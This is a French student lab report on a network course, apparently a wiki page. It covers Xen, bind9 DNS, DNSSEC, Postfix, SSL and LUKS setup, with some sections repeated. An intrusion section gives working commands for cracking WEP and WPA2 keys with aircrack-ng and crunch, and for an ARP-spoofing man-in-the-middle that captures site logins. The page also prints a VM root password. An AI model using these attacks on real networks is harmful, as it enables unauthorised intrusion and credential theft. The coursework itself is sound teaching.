On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

Les clef sont maintenant fonctionelle il faut donc les ajouter a GANDI, pour cela on se connecte a gandi puis on ajoute une clef KSK.
pour obtenir la cled on utilise la commande <code>cat glopglop.site-ksk.key</code> on obtien le résultat ci-dessous :
; This is a key-signing key, keyid 15337, for glopglop.site.
; Created: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Publish: 20201113090442 (Fri Nov 13 09:04:42 2020)
; Activate: 20201113090442 (Fri Nov 13 09:04:42 2020)
glopglop.site. IN DNSKEY 257 3 5 AwEAAc3TCJkWFGnZSj/Q364AF7n69UaXum/no+LuEbXbGjTXLETdYk+Q gVAmIpvbJXcG0rucJTbVFaHr8IhWqf7VvkCbEGAORAkzBVXThPDR1pZR lJDEY88Lb2T6k9uHw43l2oP8vPev2eIRbU3VxUuJs++elgj32DTBA+yK p++/gz29H6PQVpkHnH81RjGdV+K1RZEwxkuev2MmB329fhMRwTsbW0BV aeXc5faRk9ZEKb7tr0p7txVv4wZEL6it01ZiNyGktwLRj8ln+cQz1GtC PY/UWnCtamycE/2k4f98sdDa6TMiguuBNOPug+ODzqGiI7LNUyF4jBbf 6NAgChwITps=

On ajoute la clef a gandi comme montrer ci-dessous en n'oubliant pas de selectionner '5(RSA/SHA-1'.
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|gandi enregistrement de la clef KSK]]
 

Pour vérifier que tout fonctionne correctement, on va sur le site 'dnsvizi.net' il nous permet d'analyser le dns et représanter la chaine d'autentification DNSSEC.
[[Fichier:DNSSEC_2020-11-13_11-59-06.png|1000px|thumb|left|Test du DNSSEC]]
 

On peut voir que maintenant on a bien le statu 'SECURE' donc tout fonctionne bien.

===Installation d'une méchagerie===
====Configuration de Postfix====
Pour recevoir le mail de vérfication de GANDI il faut sur la VM un gestionnaire de mail il faut installer mutt et postfix. On utilise les commandes ci-dessous :
apt-get install postfix
ant-get install mutt

A l'installation de 'postfix' un fenètre de configuration s'ouver.
Il faut renseigner le non du site comme 'System mail name : 'glopglop.site'

On vérifie la configuration de 'postix' en allant dans le 'main.cf'
vi /etc/postfix/main.cf

[[Fichier:Config Postfix mirage.png|1000px|thumb|left|Configuration de postfix]]
 

On a bien le non de domaine 'glopglop.site' on peut relancer 'postfix'
service postfix restart
Si le service n'est pas configurer correctement, on peut le reconfigurer avec la commande <code>dpkg-reconfigure postfix</code>
====Réception d'un message====
On peux testé la reception de message en envoyant un message a 'roor@glopglop.site'
Si tout fonctionne bien, on peux visualisé les méssage recu en tappant la commande <code>mutt</code>

[[Fichier:Reception_messages_mirage.png|1000px|thumb|left|texte descriptif]]
 

On constate que on resoit bien les message en provenance du mail de Polytech.
Pour que gandi puissent nous envoyer le mail contenant la clef de cryptage, on a besoint de pouvoir recevoirr les messages qui sont destiné a 'admin@glopglop.site'

Pour cela on va modifier le fichier 'vim /etc/aliases' en ajoutant la commande <code>admin:root</code>
On crée ensuite un <code>newaliases</code> puis on restarte bind9 avec la commance <code>service bind9 restart</code>

Attention pour les test il est conseiller d'utilisé deux boite mail différante care celle ci prenne du temps pour se mettre a jours.

====Envoie du SSL Certification Gandi====

Quand on est sure que le mail fonctionne bien avec l'envoie d'un message a destination de 'admin@glopglop.site' on peux demandé a gandi de bous envoyer la clef de cryptage.
On demande d'envoyet le ssl certification a notre VM, cela peux prendre un certain temps.

[[Fichier:SSL_Certification_Gandi_Mirage.png|1000px|thumb|left|texte descriptif]]
 

Dans le mail de gandi on resoit un codde de confimartion ainsi q'un mot de passe. Une fois confirmer, on peut télécharger les fichiers 'glopglop.site.crt' et 'GandistandardSSLCA2.perm'

Une fois les fichiers télécharger et importer dans la Vm dans le dossier '/root', il faut dire que quand on se connecte sur le site 'glopglop.site' en 'https' il dois utilisé la cled publique 'myserver.key'.
quand on utilise le ssh on passe par le port '442' dans le fichier <code>/etc/apache2/sites-available/default-ssl.conf</code>
On ajoute les lignes suivantes :

SSLEngine on
SSLCertificateFile /root/glopglop.site.crt
SSLCertificateKeyFile /root/myserver.key
SSLCertificateChainFile /root/GandiStandardSSLCA2.pem

On reboot le service apash2 pour qu'il prenne les modification en compte.

==Tests d’intrusion==

=== Description ===
Un ordinateur portable et une clef Wifi est fourni par Monsieur Redon. Pour que le clef fonctionne il est nécessite pas nécessairement de la configuration. Il faut aussi installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA

=== Installation de la clef Wifi ===
Avec la commande <code>lsusb</code> on peux voir la list des interfaces connecté aux pc. Ci-dessous les résultats obtenu.

Bus 003 Device 004: ID 148f:5370 Ralink Technology, Corp. RT5370 Wireless Adapter
Bus 003 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 004 Device 001: ID 1d6b:0003 Linux Foundation 3.0 root hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 004: ID 413c:2003 Dell Computer Corp. Keyboard
Bus 001 Device 003: ID 046d:c016 Logitech, Inc. Optical Wheel Mouse
Bus 001 Device 002: ID 8087:0024 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub

La clef ubs Wifi est bien détécter.
On doit donc installer le pilote pour les clef usb RT5370 avec la commande :
apt-get install firmware-ralink
apt-get install firmware-misc-nonfree

Une fois les pilotes installer, on récupéère le nom de l'interface wifi avec la commande <code>ip l</code> et on récupère le résultat ci-dessous :
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN mode DEFAULT group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:22:4d:7a:f1:c3 brd ff:ff:ff:ff:ff:ff
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast master bridge state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
5: bridge: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP mode DEFAULT group default qlen 1000
link/ether 00:15:17:3b:14:a8 brd ff:ff:ff:ff:ff:ff
6: vmnet1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:01 brd ff:ff:ff:ff:ff:ff
7: vmnet8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UNKNOWN mode DEFAULT group default qlen 1000
link/ether 00:50:56:c0:00:08 brd ff:ff:ff:ff:ff:ff
8: wlx40a5ef059784: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN mode DEFAULT group default qlen 1000
link/ether 40:a5:ef:05:97:84 brd ff:ff:ff:ff:ff:ff

La clef wifi s'apelle donc <code>wlx40a5ef059784</code> on fait maintenant un <code> ip link set wlx40a5ef059784 up></code>

Avec la comande <code>dmsg</code> on vérifie que la clef wifi fonctionne bien.

=== Installation du paquetage AirCrack-ng ===
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il faut de taper la commande :
apt-get install aircrack-ng
apt-get install firmware-misc-nonfree

=== Utilisation de AirCrack pour clef WEP ===

Après avoir branché la clef WiFi, on se sert de <code>airmon-ng</code> qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.
airmon-ng
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):
airmon-ng start wlx40a5ef059784
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:
airodump-ng wlan0mon

On obtien le résultat ci dessous :

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

38:0E:4D:B0:E9:E0 -1 0 1 0 1 -1 WPA <length: 0>
04:DA:D2:9C:50:51 -30 49 834 0 9 54e. WEP WEP cracotte02
04:DA:D2:9C:50:5A -29 44 841 0 9 54e. WEP WEP cracotte11
04:DA:D2:9C:50:56 -28 53 832 9 9 54e. WEP WEP cracotte07
04:DA:D2:9C:50:57 -29 54 803 0 9 54e. WEP WEP cracotte08
04:DA:D2:9C:50:59 -30 50 833 0 9 54e. WEP WEP cracotte10
04:DA:D2:9C:50:54 -29 48 841 0 9 54e. WEP WEP cracotte05
04:DA:D2:9C:50:50 -29 50 841 0 9 54e. WEP WEP cracotte01
04:DA:D2:9C:50:5B -29 50 825 0 9 54e. WEP WEP cracotte12
04:DA:D2:9C:50:53 -33 46 843 0 9 54e. WEP WEP cracotte04
04:DA:D2:9C:50:58 -28 50 694 0 9 54e. WEP WEP cracotte09
04:DA:D2:9C:50:55 -30 49 746 0 9 54e. WEP WEP cracotte06
04:DA:D2:9C:50:52 -33 50 764 0 9 54e. WEP WEP cracotte03
00:14:1B:60:8C:28 -30 60 0 0 4 54e. WPA2 CCMP PSK kracotte09
00:14:1B:60:8C:22 -31 55 0 0 4 54e. WPA2 CCMP PSK kracotte03
00:14:1B:60:8C:27 -32 64 0 0 4 54e. WPA2 CCMP PSK kracotte08
00:14:1B:60:8C:24 -34 58 0 0 4 54e. WPA2 CCMP PSK kracotte05
00:14:1B:60:8C:23 -31 63 0 0 4 54e. WPA2 CCMP PSK kracotte04

Le réseau que nous voulons craquer est <code>cracotte05 ssid : 04:DA:D2:9C:50:54 chanel : 9</code>

On utilise la commande <code>airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon</code>. cela nous crée un <code>reseau_cracotte05-01.cap</code> On n'as pluq qu'a faire un <code>aircrack-ng reseau_cracotte05-01.cap </code>.

KB depth byte(vote)
0 0/ 1 F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056)
1 0/ 1 DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544)
2 1/ 3 D4(47360) 98(46336) B6(45568) A7(45056) EB(45056)
3 0/ 2 00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544)
4 0/ 1 00(50688) 09(45824) 50(45568) FD(45056) 5E(44032)
5 0/ 3 00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056)
6 0/ 1 00(51456) 09(47104) 3A(45824) F9(45824) 04(45568)
7 0/ 1 00(51712) C9(47360) 08(46336) 56(45312) E2(44800)
8 0/ 1 00(54016) 05(45568) C1(45312) D5(44544) B7(44288)
9 0/ 2 00(47872) 56(46592) 84(45568) 88(45568) F2(45056)
10 1/ 2 09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568)
11 0/ 2 99(48128) 76(47616) 99(46080) E6(46080) 06(44800)
12 2/ 4 FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776)

KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ]
Decrypted correctly: 100%

Et voila nous avons trouver clef du réseau wifi cracotte05

=== Utilisation de AirCrack pour clef WPA2-PSA ===

On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.
On va donc faire un "cassage par force brute" avec un fichier texte contenant tout les combination de 00000000 a 99999999.

On commence par installer Crnch avec la commande <code>sudo apt-get install -y crunch</code>

Une fois installer on génère un fichier dictionnaite.txt avec la commande <code>crunch 8 8 0123456789 >> dictionnaire_wpa.txt</code>
On relance la commande <code>airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24</code>
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.

Puis nous lançons aircrack-ng avec la commande <code>aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt</code>
Read 121032 packets.

# BSSID ESSID Encryption

1 00:14:1B:60:8C:24 kracotte05 No data - WEP or WPA

Choosing first network as target.

Opening reseau_kracotte05-01.cap
Read 121032 packets.

1 potential targets
Got no data packets from target network!
Quitting aircrack-ng...

On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.
Une fois que on a récupérer les data, on peux effectuer le "cassage par force brute"

Aircrack-ng 1.5.2

[00:32:18] 10323450/102795810 keys tested (2771.75 k/s)

Time left: 9 hours, 16 minutes, 11 seconds 10.04%

KEY FOUND! [ 10244444 ]

Master Key : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B
46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B

Transient Key : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8
54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B
9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70
79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85

EAPOL HMAC : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD

On a bien trouver la clé du wifi !
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.

===Exploitation de failles du système===

===Attaque de type "homme au milieu" par usurpation ARP===
Maintenant on tesnt une attaque par "homme au milieu" pour commancé, on va installer le paquetage <code>dsniff</code> pour cela on utilise la commande : <code>apt-get install dsniff</code>

On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande <code>cat /proc/sys/net/ipv4/ip_forward</code> pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.

On fait la commande <code>cat /proc/sys/net/ipv4/conf/all/rp_filter</code> la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.

Ensuite on fait un <code>ip r</code> pour récupérer l'adresse ip du routeur.
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]
 

On fait la commande <code>arpspoof -i bridge -t zabeth07 172.26.145.254</code>
On lance Wireshark en root en utilisant la commande <code>su</code> si celui ci n'est pas installer on fait préalablement <code>apt-get install wireshark</code>
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.

[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]
 

On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.
Non d'utilisateur : Oui le pas de calais
Mdp : le mdp

=== Intrusion sur un serveur d’application Web===

==Réalisations==

===Sécurisation de données===

===Chiffrement de données===

Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.
apt-get install cryptsetup
apt-get install lvm2

Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.

Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande <code>mkfs.vfat -n 'Alex.G' -I /dev/sdb1</code> on obtien le nom de la clef USB avec la commande <code>df -h</code>
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.

On peut lancer le cryptage de la clef USB avec la commande <code>cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb</code> Pour savoir ou les la clef USB on utilise la commande <code>lsblk</code>
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.
La liste des commande utilisé est listé ci-dessous :
mount /dev/mapper/Alex.G /mnt
cp -r /etc /mnt
umount /mnt
cryptsetup luksClose Alex.G

On peut voir que le clef USB crypter fonctionne bien.
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]
 

===Inspection ARP par un élément réseau===

===Sécurisation WiFi par WPA2-EAP===

TP sysres IMA2a5 2020/2021 G5

2020-11-20T08:55:01Z

Aglaine : /* Envoie du SSL Certification Gandi */

== Introduction ==

Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.

=== Tableau Récapitulatif ===
{| class="wikitable" style="text-align: center;width: 35%;margin: auto;"
! Description !! Détails
|-
! scope="row" style="width: 40%"|ID VLAN
|style="width: 60%"|Vlan7
|-
! scope="row" style="width: 40%"|Réseau IP V4
|style="width: 60%"|193.48.57.168
|-
! scope="row" style="width: 40%"|Réseau IP V6
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Nom de de la VM
|style="width: 60%"|mirage
|-
! scope="row" style="width: 40%"|Numéro de poste
|style="width: 60%"|Zabeth06
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTP
|style="width: 60%"|
|-
! scope="row" style="width: 40%"|Adresse du site internet version HTTPS
|style="width: 60%"|
|-
|}

== Installation des systèmes d’exploitation ==

Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.
Pour cela, il faut utiliser la commande :
ssh capbreton.plil.info

=== Installation dans la machine virtuelle Xen ===

Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :
xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force

L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a "capbreton" puis on utilise la commande :
tail -f /var/log/xen-tools/mirage.0.log

A la fin de l'installation, on obtient le mot de passe root et des informations importantes :
Installation Summary
---------------------
Hostname : mirage
Distribution : ascii
MAC Address : xxxxxxxxxxx
IP Address(es) : dynamic
SSH Fingerprint : SHA256:xxxxxxx (DSA)
SSH Fingerprint : SHA256:xxxxxxx (ECDSA)
SSH Fingerprint : SHA256:xxxxxxx (ED25519)
SSH Fingerprint : SHA256:xxxxxxx (RSA)
Root Password : DgtUlOmnBFERdfarGBsopGR

Une fois la VM créer, nous pouvons la lancer avec la commande :
xl create /etc/xen/mirage.cfg

On peut vérifier que le VM est bien démarrer avec la commande :
xl list
Pour fonctionner l'état de la VM doit être r ou -b
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]

 

On accède pour la premier fois a nottre Vm avec la commande :
xl console mirage

il demande alors le login (root) et le mdp (longue chaine précédemment générée).
Après nous être logué, on change le mot de passe qui devient : glopglopglop.

=== Configuration de la machine virtuelle Xen ===

Il faut maintenant installer les packages que nous avons besoins :
apt-get update
apt-get install VIM

Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :
vim /etc/network/interfaces

Dans interfaces on tajoute
auto eth0
iface eth0 inet static
address 193.48.57.168
gateway 193.58.57.163
netmask 255.255.255.248

Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :
vi /etc/ssh/ssh_config

Le fichier ssh_config doit être configurer comme ci dessous :
Host *
SendEnv LANH LC_*
HashKnownHOST yes
GSSAPIAuthentification yes

Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.
Pour cela on configure ces interfacte avec la commande :
vim/etc/network/interfaces

Puis on configure la passerelle comem ci dessous :
<pre>
# The loopback network interface
auto lo
iface lo inet loopback

# Physical Network Interfaces
#
auto eth
iface eth inet static
address 192.168.0.29
netmask 255.255.255.0
gateway 192.168.0.1

auto eth0
iface eth0 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth1
iface eth1 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth2
iface eth2 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth4
iface eth4 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth5
iface eth5 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth6
iface eth6 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto eth7
iface eth7 inet manual
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Main trunk bridge
#
auto Trunk
iface Trunk inet manual
bridge_ports eth4 eth5
post-up ip link set $IFACE up
post-down ip link set $IFACE down

# Virtual Network Interfaces
#

auto vlan48
iface vlan48 inet static
vlan-raw-device Trunk
address 172.26.191.21
netmask 255.255.252.0
gateway 172.26.191.254
iface vlan48 inet6 auto

auto vlan500
iface vlan500 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down

auto vlan502
iface vlan502 inet manual
vlan-raw-device Trunk
post-up ip link set $IFACE up
post-down ip link set $IFACE down
# Bridge for IMA5sc group
#

auto IMA5sc
iface IMA5sc inet manual
bridge_ports eth0 eth6
# Bridge for IMA2a5
#

auto IMA2a5
iface IMA2a5 inet manual
bridge_ports eth1 eth7
# Bridge for L3MRIT group
#

auto L3MRIT
iface L3MRIT inet manual
bridge_ports eth2
# Bridge for GIS group
#

auto bridgeGIS
iface bridgeGIS inet manual
bridge_ports vlan502
</pre>

== Architecture réseau ==

===Sécurisation du réseau===

==Services Internet==

===Serveur SSH===

On peux maintenant se connecté a la VM mirage avec la commande : <code>ssh root@193.48.57.168 -p 2222</code>

===Serveur DNS===
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.

Nous commençons tout d'abord par installer bind9 via la commande suivante : <code>apt-get install bind9</code>

==== Création et configuration named.conf.local ====
Le <code>named.conf.local</code> permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP.

Il faut tout d'abbord modifié le fichier <code>/etc/bind/named.conf.local</code> qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.

[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]
 

Puis créé le fichier de configuration appelé <code>glopglop.site</code> avec la commande <code>vim /etc/bind/glopglop.site</code>

[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]
 

On relance le service 'bind9' avec la commande :<code>service bind9 restart</code>

On vérifie que le DNS fonctionne bien avec le commande <code>host dns1.glopglop.site localhost</code>
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]
 
Le DNS fonctionne donc bien.

==== Configuration gandi.net ====
Grâce au registrar gandi.net, nous avons réservé le nom de domaine <code>glopglop.site</code>. L'extension <code>.site</code>

[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]
 

On va maintenant ajouter un "glue record" qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.

[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]
 

Une fois le "glue record" renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.

[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]
 

Une fois les serveuyrs de non configurer, on peux fermer GANDI.

===Sécurisation de site web par certificat===

===Sécurisation de serveur DNS par DNSSEC===
Premièrement, on ajoute <code>l'obtion dnssec-enable yes;</code> dans le fichier <code>named.conf.options</code>.
====Génération des clef asymétrique====
Il est important de bien sauvegarder la clef privée, sinon nottre système de clef ne fonctionnera pas.
pour commancer, on crée un repertoire pour stocker les clef.
cd /etc/bind
mkdir glopglop.site.dnssec
cd glopglop.site.dnssec/

Une fois dans le dossier <code>glopglop.site.dnssec</code>, on crée les clefs avec la commande<code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 2048 -f KSK -n ZONE glopglop.site</code>
On obtien :
Generating key pair...............+++++ ..........................................+++++
Kglopglop.site.+005+15337

On crée ensuite le clef asymétrique pour la signature des enregistrements, pour cela on utilise la commande <code>dnssec-keygen -r /dev/urandom -a RSASHA1 -b 1024 -n ZONE glopglop.site</code>
On obtien :
Generating key pair................+++++ ..................................................+++++
Kglopglop.site.+005+55608

On a bien maintenant la paire de clef privée/publique. Le problème est qu'il est difficile de les distinguer avec leurs nom compliquer, il faut donc les rennomer pouyr plus de transparance.
On renomme donc les deux paires de clefs obtenues en utilisant le nom de la zone comme préfixe puis en suffixant d’abord par la destination de la clef (-ksk pour la KSK ou -zsk pour la ZSK) puis par le type de clef (.key pour la clef publique ou .private pour la clef privée);

mv Kglopglop.site.+005+15337.key glopglop.site-ksk.key
mv Kglopglop.site.+005+15337.private glopglop.site-ksk.private
mv Kglopglop.site.+005+55608.key glopglop.site-zsk.key
mv Kglopglop.site.+005+55608.private glopglop.site-zsk.private

[[Fichier:ClefPrivéePublique_2020-11-13_09-23-42.png|1000px|thumb|left|Clef Privée et Public]]
 

Dans <code>db.glopglop.site</code> on ajoute les deux lignes ci-dessous :
$include /etc/bind/glopglop.site.dnssec/glopglop.site-ksk.key
$include /etc/bind/glopglop.site.dnssec/glopglop.site-zsk.key

On signe la zone d'enregistremment avec la commande <code>dnssec-signzone -o glopglop.site -k glopglop.site-ksk ../db.glopglop.site glopglop.site-zsk</code>
[[Fichier:Zones_d'enregistrement_2020-11-13_10-27-11.png|1000px|thumb|left|Generation des zones d'enregistrement]]
 

